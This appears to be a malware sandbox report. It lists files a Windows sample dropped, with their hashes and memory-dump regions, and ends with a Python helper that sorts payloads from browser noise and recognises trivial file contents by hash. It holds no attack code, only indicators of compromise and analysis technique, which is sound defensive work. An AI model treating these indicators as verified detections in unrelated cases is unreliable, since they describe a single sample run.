SHA512 b484f0bf5c47343080b90a05693efba1c8325a89a66769ca98d7e462921b5efe75166c518b706ca255c900fc713b04120d510d50b048c839e6824da3f7beda21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 78dd11c0cd251d698831645283b7ac45
SHA1 74b3105891012b897f9db1fe11f73a89e174b8a8
SHA256 89dd50e1b7866285f1f07af861bfdc970cfe2bbe2b53bc97f3c9e9103e138ad1
SHA512 c9cf1a6e201cb60dbd3c9a64e60067d05229246130bb7b733edb92d1128acfe340a3699cc9c1ee030d451828344940e365adebae9dd0c2dfc3ce21697f49a919

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\6d4dd00a-20f8-44ed-b72b-41faba8195cd.dmp

MD5 57befb4cb3b636b24199c6432fd2bc9a
SHA1 d9082bb4c09e591e460298d6af967837935e0b74
SHA256 a162db0db967d5c43bee471cd3145b9a399da9eb257e705b03371da3a3b5589a
SHA512 c0046e9d8c21ebd63e1dc32af2c58e32c27fd877fc5c883dc2ea4160cc72750a0089d13d1771aad32a7eaf8f84df2dcbd039220c0c45100a6ec54171dd2fd084

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 ae34eace9321fb46b0c39e2bcf6ba351
SHA1 9e8d9443c4c4c226ec97507993c83f80bd766c8a
SHA256 e091ca725ae69f3124a535613e1e3e7ad18c478803a61760aba4db3b6039dd66
SHA512 0d2ba877d5ccb8f00054b19cbefe60b56663d06412dc3c29b9d7ea5284a5e9fb08b7d3793c6dd301220ec6ed020935bc8d807d5bfb1d2c5cfdbee50880e698e4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 69f0c2e37b3fdaa5026cbc32f0a80579
SHA1 2f47a2f98038a1e5d2ea9d7e473b9c6356b5c401
SHA256 d7ecfe305e4e15117b77c97b55b9c7b894ef0b91320eb177809fe0178c52d456
SHA512 838d4373f3bfc1e11353b8bc5088804eb456c47c7f624930e9c2cdfe0b4375cc99c578081ed5a1013784ac014fbaaada127418d7329cd410e997ffb4132e53be

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\fe6a7c41-ebbe-433c-b68d-e6941e6e5d05.dmp

MD5 6b321358d7e5125d2f9117f172f85e7a
SHA1 923f36eab12e992e80d3c13fb8f68440e48777c7
SHA256 5cb533efee4d8bea5973683b506b7771f2a175a8db0634663900dec56458b47c
SHA512 62a7f07ea14a2eb44dc5e3f0e8bffef3d763cc0313a63a650fb8a8d85e3d7ff5b9811a1c77c78ca1f1d8aa6d0779fb2ff637cae4d59b2a685726853527c1aec0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 04f912d94fdf1c4fe53236d9c8cdb965
SHA1 76fb1f355088b685bd893e40d4172af61c5a7b56
SHA256 13ae6cb3c40d15fa7b670181546561223aae7df88c2e4299794656dfd6be38b7
SHA512 5b60faf620d6cf63e309806ec31ea3d4b9685e9aaa1f8c66c92edfadc9aa902b5e0b84883d655c25144e238834675ba05c4adaf2ae2a651be8e036adb21a8819

C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe

MD5 5d153f73ce1b6a907cf87ddb04ba12b2
SHA1 bfda9ee8501ae0ca60f8e1803efea482085bf699
SHA256 2af376f6a5d706982e3ac08f54d737c4c203bdc2c2c1cbf5f9fc9d4a3a775b2c
SHA512 0f6ef7ff7db227bec5d2a1dcef461313cde66b5ec38f5efd377e533ef15d87eb4aef6cf387ee7c7b63d1142a883bb18577f97dec0dcd818b93891e87f499c102

memory/5496-1153-0x0000000000910000-0x000000000131D000-memory.dmp

memory/5432-1157-0x00000000000E0000-0x0000000000D31000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VHQUNTV1\service[1].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

memory/5432-1176-0x00000000000E0000-0x0000000000D31000-memory.dmp

memory/5432-1181-0x00000000000E0000-0x0000000000D31000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\1d4fc8b6-451e-403f-a81a-1eb4fda0a7f3.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 42ae114ed0c929f72f5260137e14d03d
SHA1 f5ea7ffa19207f637554b318b62cc086e3182f24
SHA256 8adc3ce2574b1e7fe9c74b107d5737c07274705ab69aa8e8f70f9de2ab336435
SHA512 6fa76a49c7b38967dab2d1afc1dd12711e6fb16e506612972fbbfc42f6ce177d47e164c0d9a7511959f4e883b62f188fd60e2c906f639f782ecec0ef48b4c30e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e4570dfb6be6f47804ca8dad9e8064c9
SHA1 68e70ba9ecc246cfa0329b87b937c7bd11c3b797
SHA256 d9f3afa26f6cde4fe90fc1af1a687e76832e6b8679cf042a57b58afe49a4ca88
SHA512 0e366262a21ce045e545f490868af2c891bbbe4fba311bcaf8e04f12cccd416dea66f8e17d6dbe722bc8d4a77a30cdf5212e685846e419d0ac1e47a773428976

memory/6092-1230-0x000001B56D3C0000-0x000001B56D3C8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe

MD5 8538c195a09066478922511ea1a02edf
SHA1 15e8910df845d897b4bb163caef4c6112570855b
SHA256 d5008972ddedb199731712f9fef3b3aa5a5cd666b600136a9da84656739d4e96
SHA512 60b2c66006b226140f7bf50c94c65088081b311ee92c6dea376a1349ff2380e0ce053a84b2df3be8a54bf7f7bb76f1add8417f4f1bf2fb0681e008cbd5b1725c

memory/4940-1247-0x0000000000C30000-0x00000000010DB000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\16dd7580-ad9a-43bd-93f4-096d77058246.dmp

MD5 bda9526514349e44938ab0e6506817f5
SHA1 18f7eb81f49289d4ffc3ae2ea740b9dda7cecb0e
SHA256 553e96dc2042d5781618cd48606525202bd7a2515884fcbb083ad1546d827ce1
SHA512 beef54c3c5a7f82973c0a86fbc4757a8172403d09a4739410f8789c094d6867006108861d3ac2d3b713cbf6ce4c3b8e18ffcf3dd741794969c107a0728e4ff93

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 13c6b7037373fa009885dbf182a77dbd
SHA1 3fa3f14a22f5b4c5992b74d0433770b88aeca63a
SHA256 18642cb88fcfcdd36ff8ef78362cabb70395ce95dd9d20bfd8ecdd70d7f23b19
SHA512 74c129de61b99ca4c8c9ccfe489f5ee03b1c996aa506c9eb13f1addcb8faa96e410467ca1115eb1bc6dbaf7214d02f60fb3cbe27d03bb6e301e0c6283dc0bd05

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\89aff369-1a97-4bfe-a751-f75f18326e18.dmp

MD5 8c6a68d54a0a02aea7856435cadd78d4
SHA1 2f6c6f73435408973342f01ce9af6c14943de75d
SHA256 56100601d25a45cfdf39ad9954fd0303c13fc7b1432e10f23d2fdd3626310638
SHA512 460ddd1b1d60414bf119171a260429c4dcd4d3b4b223841962bce309146e068f35d32f95e4dccb07657628a9fa055369e128b033a07490f0c6757db098f5652e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 bd57406ba0ff953859ddf57f3e5afc56
SHA1 12d83f7a56d7d13ed89aad75b402b07a85bdafdc
SHA256 f643384593037d3c17788c0b9c9a821fa8bcd844b1d2afa0085e39c4da0df9ec
SHA512 3d403e7ec03a29901566d7a4f1a15ecc42240c7fdebe3bf1a445974da2c5872edcccf7de02b6f057d8f123048a8b121f84fdc4218c2d52ff7a90ffae766ca887

C:\ProgramData\151677C0788F62D0.dat

MD5 f310cf1ff562ae14449e0167a3e1fe46
SHA1 85c58afa9049467031c6c2b17f5c12ca73bb2788
SHA256 e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855
SHA512 1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

C:\ProgramData\4C934CFF52CBF49B.dat

MD5 af4d3825d4098bd9c66faf64e20acdc8
SHA1 e205b61bd6e5f4d44bc36339fe3c207e52ee2f01
SHA256 095484268f554458404ca64d5c9f7b99abe0dbb1a75e056184047dc836f2e484
SHA512 71b4b99614e28a85925033f95d90e7c43f958b2284f7d7605d2ea896330efa9bba8b6d9550f62829daec3cf452e95c964ddb30cd9c7850bfa41a988792132e78

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 a25e32d4cb1438f5f605b85032965d23
SHA1 35f44eb8576628a336d513f3c887b9c1b4a54380
SHA256 8d1a9f811f0b6c10b09eac8c87e1c89278be9a8ab90bb01d7bc09f5a93d953c5
SHA512 57a9900b8fd27c57599e9cd3c14d7ae53cb5a3505cb624023baf4b4ec0c81492269bbf3b277ef6c61e33fa6cec62b313c239c07f745527d427ed5414222fe148

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\96326922-4ce5-4e55-afa1-ed27fe4316da.dmp

MD5 09f8aba7405bbec23ec96816ea28cd5d
SHA1 c37dc0919b5b14af911c6eaca53d3c5c84d23609
SHA256 d7d435d0e5fa745538479dfc0aca66ee14f601b09ddfb6063dc2064badd5c071
SHA512 1dca85f7ad9532fe790a9179444c20788790cd5085bede3dbda085f281f9d33269f535470b039251d668ccf47032f52da89453c7e23f5d0eb4e687eb9c3cb551

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 9177ec31512b13a2dea3e6272784b23b
SHA1 67a685da0ec3c05575b3813e5e206be72da72be6
SHA256 b2832da3da4c29254bd81a9edea325b31ff3fc27e89a981e9f35abb40fe22621
SHA512 d2ff54a24382876703025f37fedc2b67f6a1089989fc6c5d40cfac410121c93ad9579a8abcd1e4678e2ba89747d76631fd709e03516e0f54df729d65820c74c8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 69c9b64227f2773e794311829a8936b3
SHA1 f0e808fa9645aa9e07c0c58c418d7bdb1eee1aae
SHA256 00d03dc10dee70951921f5a008028634ec162e9d68f171e753152c9004c5e5b0
SHA512 cfb69f0d11205b1180394e8d73684ffb6c580f8ebffa280b71dd25786afad1107ceadbc27b739391ced6b0637ac390fe6240b51ec21aa520c6452efad06428a8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\3222f732-2177-42ad-9e6a-da378fbf0e62.dmp

MD5 79905c678effb7dff2260658b29f7bc0
SHA1 7ec54c1f3d6d975e26d6497e7b6d373eb7126f38
SHA256 41147be385911577e71f01bcc7437badbf3ebdb0355a0c55926bdcd863886d31
SHA512 4a1e1cd215a820def52a012c72b833b504424ee10c17a8ec60c2ef97683c3f71aa981786030aafe430e57b34ced9bca0af8df104a5f43223490377521e1bf18a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 a01447eebf0a4d103b98f231cf662cca
SHA1 9272733cfe8b7c4bcfffedc6a924fb67e438fdf3
SHA256 1bcf7a0b57c1c6aa20b883bce5761ec2dfe437badac7216f2650d1339e7a0e25
SHA512 28580013f00536cfceb52c63805eaac88e489d2bda87ee9aaf20821a8026c7a3ebe7877cd0112e9413532a9cf0574eae97f4996670f2b00b5ef2df0fa39b8200

memory/4236-1449-0x0000000000950000-0x000000000103E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 c9a7dcc31017a19a0097dd343457568c
SHA1 b829b1f0970edee5dca062f67e87240fcb8d3620
SHA256 ac221444851d59a2984b8b43ae09bf1959298387e909457469268f298d7d78c4
SHA512 7ad4e7c442cc0583ccdd1e09de4a470afa405ed03bbd52940cbdeede36ca47ee0eab525eb59bd6f035549427f658ff46cc400344be018d907cb96153440c48d3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 ad7a864e42d2a38256e0799eedc6bf7e
SHA1 fa73d4dbb129577e74ab9c1b387faff7265daccb
SHA256 1a4f61c73b59b5ea40f74ce2e89abb285973f79ecc872109d82cfaa2254ced2d
SHA512 c52f506a0078f4762d14387324e44470db7196fb99cd2d1d452c6a473c068f6fa77054187d18f66b07a21b3ac7cce02e3a710135a87e00c8d317398030a11160

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\43f10459-525f-4bab-8836-4426e83c31f3.dmp

MD5 bbe59c6422a5075c267c5704d0ba00fb
SHA1 636388c2cd0d582654bb63eb6637c4744759368b
SHA256 a0432499a18c968d34d4b7fc7acacaa1152f469b8cb5b244557307c2971082ad
SHA512 427cb5dc16ab1a16e387f9ce7e6db42fafd99e1339fe6db73c1dbf73b1daa043829ec434583e49c73d26aa273b2e4ec01d26880ad685c0d1f0cf8e3b85828d84

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 b0366b41329a9829390dbb17f99d2502
SHA1 8c56fd72123eafd46f11c8d7a50000deea1349bd
SHA256 984aa8c01744d2afe6d73d4858a0a4bcf491f9d7925657ebf4c1286fb8a7c764
SHA512 1a1649d9993cac3292e8b32fe06c642ce324c9c1c98540a1731a7263ad1876a7550512702b279713800786d97a5ad6235ff055fb2ed3d1739947f03b44ce18e3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\f22ea649-cf34-451f-80f6-60193fbd3910.dmp

MD5 fab0f011ad3fac702309f0572294aa81
SHA1 e9ce592987e325428c2174c3ac7848ee3d9c612d
SHA256 d25750b4edec1ce915cf1dfecab88fd59aad20860b79181c4a62c3a1857cc6da
SHA512 b294b9bf4276b52d5305c8e2556f63a0a55639abe38a257af412a6ee96f5060e1c1eeb802292aeb591efa400464c2955168c9e90a3d7dcfbdc51eca3d411f65c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 8ae40dc8d8a4a79ba80d60d9d5548900
SHA1 399763331fd83e1c5cc5922dab71dfc6a0895535
SHA256 713209394f5a93f2be928fc09d7c4e448d395b7965ea5bc564425d2d76445719
SHA512 6021856c9ba57f4df2bac7e19e0a7534f424d2f2c0f77da597ca0e5465d963468baf580e856b5617c07112ef0e6ef5379eefa2623045ad4c77b4ab38ff4653d7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 366276e608b25cff8456fc32492a2d74
SHA1 01196c5fd49bfd951f9175a4747d53588fe1b8b1
SHA256 a11f869acf53ce585f90d776351ec55e6a04b5f82f7ba608eaeee4bb59a344ea
SHA512 5ba4fb2c320435662a9266851b0d5219e7fda6b19469773a01892b57b66e2f774f92670dd2c628be72174c4eb594fe5440e3e415e441f55d3246f4fda0518935

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\6dd855f3-8317-47ce-8899-ffb8d1488ed3.dmp

MD5 d09620ec6f304894d02b734d8a8cb617
SHA1 c1e724a2c79d3bd35f1a8c6dd2960747f128ff81
SHA256 5ea22bb945eb1211c28825dd1766e7e7f16b8982ae6fac1ea6535d0775c24b75
SHA512 e123e9b0748c83fb1ec94ac47acbccfd4f7133a66d68be079d3b082705e6362f9617155d4f4acd02e2970e42a1236d54b6ceb03af133e2ec7e0aaf32fd7b2999

C:\ProgramData\pp8y5\d2dba1

MD5 9618e15b04a4ddb39ed6c496575f6f95
SHA1 1c28f8750e5555776b3c80b187c5d15a443a7412
SHA256 a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab
SHA512 f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26

memory/4940-1634-0x0000000000C30000-0x00000000010DB000-memory.dmp

C:\ProgramData\pp8y5\hvsri5p8g

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Local\Temp\10107710101\8a07a872cb.exe

MD5 7c169698effcdd45b7cbd763d28e87f5
SHA1 4f9db666d66255cd7ca2b0973ff00eae8b155f7a
SHA256 c7fd445ebedd5cfa9a01daccc7c5771a88f1719b6dbfe16c9f0334fc4371250b
SHA512 58335071c6f27e72c8cd505859c9b122ff354395b239697311c1ce17f224c58dd9e2894fbc874c835866a299b3ae9ffab767195a253698fed0d39f3fb15ff8e3

memory/5380-1655-0x00000000007C0000-0x0000000000AD3000-memory.dmp

C:\ProgramData\pp8y5\pzmgln

MD5 601dc8fc93b531f51788c190aa25e961
SHA1 48216606be0aa992ab4f65e02e54cffd4b863baf
SHA256 06e9c1838a72ae74e6f21f4ee3eb863992284d17e9d1fc26c11641edaabec500
SHA512 6ee28c132f509831c501c111da50739ac96c57d698fa1da7f1526ccaf90db2edf699516aed3431ada80dcf94b98681dfc71b9237581d54e513fbcc3b987ae17a

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133856892473864900.txt

MD5 b905d5acc92eed2e38f7094e3dce25fb
SHA1 f296e7301acba89ec1283887e684e0e8ae8b09c0
SHA256 398f9db1d932be8f5575888d9fcab7714fe95a54660392461f939941925caaa8
SHA512 b7ed91bc1fba2c280d8047887c198b426835cf6d3c65670974a45c20b0b72bc3eb31c0b60256b09569c3a27872887615aaff0a3d1a6799f6ef875a0e0c946efb

C:\ProgramData\pp8y5\p8gdtr

MD5 40f3eb83cc9d4cdb0ad82bd5ff2fb824
SHA1 d6582ba879235049134fa9a351ca8f0f785d8835
SHA256 cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0
SHA512 cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2
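The listing above is raw sandbox output: dropped files with their MD5/SHA1/SHA256/SHA512 lines, interleaved with memory-dump names of the form `memory/<pid>-<sequence>-<start>-<end>-memory.dmp`. The Python below is an added triage helper written for this page; it is not part of the report or of any tool the report names. It parses that layout, sets aside the Edge profile files (an assumption: they are written by a browser the sample launches rather than by the sample itself), keeps the payloads under numbered `Temp` subfolders and `C:\ProgramData`, counts how often each memory region was dumped per PID, and compares every hash against the hashes of a few trivial contents. That last check pays off here: the hashes recorded for `INetCache\IE\VHQUNTV1\service[1].htm` are those of the single byte `0`, and the `.tmp` under the Edge profile hashes to a single period, so both contents can be read off the listing without the files. The path patterns and the trivial-content list are the example's own assumptions, and the sample input is a constructed abridgement of entries copied from the listing.

```python
import hashlib
import re
from collections import Counter
from dataclasses import dataclass, field

# Constructed sample: entries copied from the listing above, abridged to the
# MD5 and SHA256 lines (SHA1/SHA512 lines are parsed the same way).
SAMPLE = r"""
memory/5496-742-0x0000000000910000-0x000000000131D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe

MD5 c83ea72877981be2d651f27b0b56efec
SHA256 13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482

memory/5496-903-0x0000000000910000-0x000000000131D000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VHQUNTV1\service[1].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\1d4fc8b6-451e-403f-a81a-1eb4fda0a7f3.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

C:\ProgramData\151677C0788F62D0.dat

MD5 f310cf1ff562ae14449e0167a3e1fe46
SHA256 e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855
"""

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-f]+)$")
DUMP_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
# Path heuristics (assumptions, not report semantics): Edge profile files come
# from a browser the sample launched; numbered Temp folders and C:\ProgramData
# hold what the sample dropped.
BROWSER_NOISE = re.compile(r"\\Microsoft\\Edge\\User Data\\", re.I)
PAYLOAD = re.compile(r"\\AppData\\Local\\Temp\\\d+\\[^\\]+\.exe$|^C:\\ProgramData\\", re.I)
# Tiny contents recognisable by hash alone, e.g. a one-byte server reply.
TRIVIAL = {(algo, getattr(hashlib, algo.lower())(b).hexdigest()): b
           for algo in ("MD5", "SHA1", "SHA256")
           for b in (b"", b"0", b"1", b".", b"\n", b"ok")}

@dataclass
class FileRecord:
    path: str
    hashes: dict = field(default_factory=dict)

def parse_listing(text):
    """Return (files, dumps): FileRecords and (pid, seq, start, end) tuples."""
    files, dumps, current = [], [], None
    for line in (raw.strip() for raw in text.splitlines()):
        if not line:
            continue
        if m := DUMP_RE.match(line):
            pid, seq, start, end = m.groups()
            dumps.append((int(pid), int(seq), int(start, 16), int(end, 16)))
            current = None          # a dump line closes the previous file entry
        elif m := HASH_RE.match(line):
            if current is not None:
                current.hashes[m.group(1)] = m.group(2)
        else:
            current = FileRecord(line)   # anything else is the next path
            files.append(current)
    return files, dumps

def trivial_content(rec):
    """Bytes the file held if one of its hashes is a known trivial content, else None."""
    for algo, digest in rec.hashes.items():
        if (algo, digest) in TRIVIAL:
            return TRIVIAL[(algo, digest)]
    return None

def dump_regions(dumps):
    """Dumps per (pid, start, end); a region captured repeatedly is the one to carve first."""
    return Counter((pid, start, end) for pid, _, start, end in dumps)

def triage(text):
    files, dumps = parse_listing(text)
    out = {"payloads": [], "trivial": [], "noise": 0, "regions": dump_regions(dumps)}
    for rec in files:
        if BROWSER_NOISE.search(rec.path):
            out["noise"] += 1
        elif PAYLOAD.search(rec.path):
            out["payloads"].append((rec.path, rec.hashes.get("SHA256")))
        if (content := trivial_content(rec)) is not None:
            out["trivial"].append((rec.path, content))
    return out

if __name__ == "__main__":
    r = triage(SAMPLE)
    for path, sha in r["payloads"]:
        print(f"payload  {sha}  {path}")
    for path, content in r["trivial"]:
        print(f"trivial  {content!r}  {path}")
    for (pid, start, end), n in r["regions"].items():
        print(f"region   pid={pid} {start:#x}-{end:#x} ({end - start:#x} bytes) dumped {n}x")
```

Run it against the full listing rather than the sample to get every payload hash in one place; the region counter shows that PID 5496 had the same 0x910000-0x131D000 range (0xA0D000 bytes) dumped more than once, which is the dump to open first. The trivial-content table is deliberately short; extend it with whatever one-line responses you see from a given family's servers, since a matching hash tells you the reply without needing the cached file.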